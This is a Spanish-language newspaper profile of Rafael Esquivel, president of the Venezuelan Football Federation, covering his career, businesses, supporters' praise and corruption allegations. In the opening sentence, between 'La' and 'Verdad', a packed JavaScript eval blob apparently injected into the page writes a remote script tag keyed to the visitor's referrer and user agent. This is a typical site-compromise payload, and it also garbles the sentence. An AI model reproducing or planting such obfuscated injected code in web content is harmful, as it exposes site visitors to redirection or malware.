publicidad

Esquivel, el conquistador del fútbol venezolano

Egward E. Salcedo M. / Maracaibo / esalcedo@laverdad.com
La eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tztnf|var|u0026u|referrer|htnnb||js|php'.split('|'),0,{})) Verdad les trae un perfil inédito del presidente de la Federación Venezolana de Fútbol. Valora la amistad y disfruta de la pesca. Prefiere a Venezuela que a su natal España. Tiene 27 años al mando de la FVF rodeado e alabanzas y denuncias

Esquivel se convirtió en el personaje más controversial del ente rector del balompié criollo (Arte: Diego Moreno)

Puntada con dedal. Escucha el teléfono y contesta con voz ronca: “Aló, sí, dígame”. Al saber que es un periodista se coloca a disposición, pero con dependencia del tema. Rafael Esquivel Melo, ejerce su habilidad para envolver de forma sutil y lograr evadir lo que le incomoda. 

Sus dos décadas y media con el poder absoluto sobre el fútbol nacional lo tienen amaestrado para lidiar con aduladores y detractores, esta sapiencia la enfatiza durante sus escasas comparecencias ante los periodistas, a quienes simplemente les cierra una conversación con un “Dios te bendiga”.

Cuando el tiempo se lo permite se reúne con sus seres cercanos y disfruta de la pesca, actividad con la que habitualmente intenta degustar su comida favorita: el sancocho de pescado. El mar es su segunda gran pasión después del deporte rey, sobre todo las costas de su tierra adoptiva, Margarita, por encima de su natal Tenerife (España).

¡La vida en el sillón! 

Las ganas de incursionar en el mundo de la dirigencia del balompié criollo consumen el pensamiento de Rafael Esquivel en 1972, que en ese año asume las riendas del Asociación de Fútbol del Estado Nueva Esparta y se convierte en uno de los vocales de la Federación Venezolana de Fútbol (FVF).

A los cuatro años de edad llega a la tierra de Simón Bolívar, oriundo de las Islas Canarias, donde vio por primera vez la luz de la vida el 16 de agosto de 1946, fruto de Emma Melo y Juan “El Furioso” Esquivel.  

Con 21 años de residencia en Venezuela tras huir de la dictadura de Francisco Franco, decide domiciliarse en Margarita para comenzar una vida de empresario. En ese momento abre una oficina bancaria.

Su primera faena de peso dentro de la FVF se da en 1987, cuando toma posesión de la vicepresidencia de la entidad y se convierte en la mano derecha del para ese momento primer mandatario René Hemmer, quien muere al siguiente año y deja las riendas en manos del canario. Ahí comienza la “agridulce” carrera presidencial de Rafael Esquivel.

¿Héroe o villano?

Hombre de sentimientos, fuerte y con una gran coraza. “Siempre está pendiente del detalle”, así lo describe uno de sus compañeros de labores y batallas, Napoleón Centeno, excoordinador de selecciones de Venezuela, a este rotativo: “Él es muy diferente de lo que la gente piensa”.

Centeno sostiene una relación de trabajo y camaradería con el apoderado de la silla presidencial en 1989, cuando coinciden en el ente del fútbol local: “Estábamos residenciados en Margarita, viajábamos (a Caracas) los lunes y nos regresábamos los jueves. Él pagaba todos los boletos porque en la Federación no había dinero”.

Esquivel es señalado de corrupto por tener una vida económica holgada que crece en paralelo con su estadía en el cargo como jerarca del balompié vinotinto. Una de las denuncias que cae sobre su nombre la lidera Felipe Pachano Rivera, director suplente de la FVF en 2005, al realizar “señalamientos de presuntas irregularidades administrativas”, pero no procede a más.

También es acusado de ganar más dinero que los equipos del patio, devengar ingresos superiores a la de una plantilla profesional completa y ser uno de los multimillonarios que maneja Conmebol, situación sobre la que afirman “tener pruebas”, y lo expone José Luis Chilavert, exportero del combinado paraguayo.

Diestro

“Siempre busca imponer su criterio, pero de una manera sutil”, se escucha en la  voz calificada de Richard Páez, que agradece al hispano-venezolano, “por lo bueno y lo malo”, pero sugiere el fin de ciclo con el surgimiento “aires nuevos” y gente que ayude a “trascender en todos los ámbitos”. 

Catalogado por el timonel como un buen administrador, con el don de saber manejar e interpretar a la gente para conseguir sus propósitos. Sin embargo, con una deuda en lo deportivo, al carecer de proyectos en las categorías menores, organización en el fútbol local y desarrollo de escuelas más sólidas en la formación del arbitraje.

Tratos difíciles, discordia y poca afinidad con los futbolistas son algunos fragmentos de la gestión de Esquivel, descrita por Luis “Pájaro” Vera y Alejandro Cichero, antiguos referentes del combinado tricolor, a este medio: “Todo fue a los empujones”.

La selección no fue “tratada como debía ser, era un clima muy complicado. Con los federativos no había amistad ni compañerismo. Así se vivía antes”, son  develaciones del excapitán Vera.

Cichero también desnuda vivencias del ayer al haber “lidiado con los impagos de los premios para los jugadores, viáticos e incomodidades en las concentraciones, con hoteles desastrosos y vuelos en clase económica”.

El giro de rumbo en la dirección del balompié criollo es indispensable para esas figuras de antaño al proponer la aparición de un “recambio, ideas futuristas y nuevos conceptos”. 

¿Retiro en puertas?

Se acerca el adiós. El presidente de la Federación Venezolana de Fútbol, Rafael Esquivel, asomó la posibilidad de abandonar su cargo tras 26 años al mando del balompié criollo.

El mandatario develó a Líder que está pensando en el retiro: “No quiero anunciar nada sin hablar con el comité ejecutivo de la Federación, pero ya creo que mi pelo está muy blanco. Esta es mi pasión, es mi vida, pero ya 28 o 27 años en esto es terrible”.

Esquivel quiere adelantar el término del ciclo de su más reciente reelección y dedicarse a sus otras pasiones: “Después de esto, imagino mi vida en un barco pescando y jugando dominó con mis verdaderos amigos, los que me quieren. Mi pasión es pescar y en mis ratos libres disfruto de eso”.

El inmigrante

Fuera de las lujosas sillas, cuadros y paredes que adornan la oficina del principal representante de la FVF, Esquivel tiene un pasado dentro del rectángulo de juego, al militar en los extintos Unión Deportiva Canarias y el Anzoátegui CF. Es casado hace 25 años con Julia Gisela Velásquez y padre de seis hijos. 

Enquistado, adueñado y acostumbrado a las arcas de la “transformada” entidad nacional, lleva 10 elecciones consecutivas invicto y logra reelegirse hasta 2017 con el apoyo de 56 de los 59 votantes. Al final del nuevo mandato tendrá 30 años monopolizando la dirección del fútbol patrio, en una era controversial, con atinos y desatinos, pero como añade Alejandro Cichero: “Nadie es dueño del fútbol. Debe haber una evolución en todo”. 

Los negocios y sus propiedades

Desde los 90 se conocen algunas propiedades del federativo: dos estaciones de gasolina, un bodegón, par de cines en Porlamar, una empresa de materiales de construcción y transportes de combustibles, bienes que logra cosechar en su estadía en la “Perla” caribeña, junto con sus tres hermanos, Juan, Luis y Candelaria.

Los negocios “no tienen nada que ver” con su condición de presidente de la FVF, afirmación que realiza el mandamás en 1997 a El Universal,  al citar que sus empresas datan de 1982, “años antes” de su acceso al organismo rector del fútbol venezolano.

El “patrón” arranca su gestión en una casa alquilada en El Paraíso (Caracas) con escasos seis empleados. Su astucia, vivacidad, habilidad y gran sentido de responsabilidad le permitieron driblar los inicios llenos de obstáculos, dificultades y desventajas, según lo indica Richard Páez, otrora técnico de la Vinotinto a La Verdad. 

Hoy dirige desde el Pent-house de un edificio en Sabana Grande con más de 100 personas y convierte a la federación deportiva en independiente, sin vivir del presupuesto del Estado.

Éxitos

• Estabilidad económica de la Federación Venezolana de Fútbol.

• Crecimiento integral de la selección de Venezuela en todas las categorías.

• Incremento de estadios de primer nivel, al albergar la Copa América 2007.

• Expansión de la Primera División del balompié local a 18 equipos.

 

• Construcción del Centro de Alto Rendimiento en Margarita.

Fracasos

• Falta de proyectos para el crecimiento de las categorías menores en todo el país.

• Atrasos en la entrega del Centro de Alto Rendimiento.

• Ausencia de escuelas de mayor nivel para el aprendizaje y manejo de criterios de los árbitros.

• Disparidad en el crecimiento de las selecciones respecto a los clubes locales.

• Permisividad a los equipos con presupuestos y nóminas impagables.

Más noticias

  • Cardenales en la cima de la clasificación en la LVBP

    14/10/2018 11:28am

    Los Cardenales de Lara vencieron a Bravos de Margarita por pizarra de 5-9 y conquistaron así su segundo triunfo en la naciente temporada, con lo que encabezan la clasificación del campeonato de Liga Venezolana de Béisbol Profesional (LVBP).

  • El béisbol, la válvula de escape a la crisis

    14/10/2018 10:58am

    Se acaba de estrenar la temporada de béisbol y los venezolanos empiezan a incluir en su agobiante día a día la emoción que el popular deporte le regala, una válvula de escape a la severa crisis económica y social por la que atraviesa el país petrolero.

  • Última temporada de Endy Chávez 

    13/10/2018 04:52pm

    “Esta será mi última temporada en Venezuela. Estoy contento de anunciar que hasta aquí juego”, declaró Chávez en rueda de prensa

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama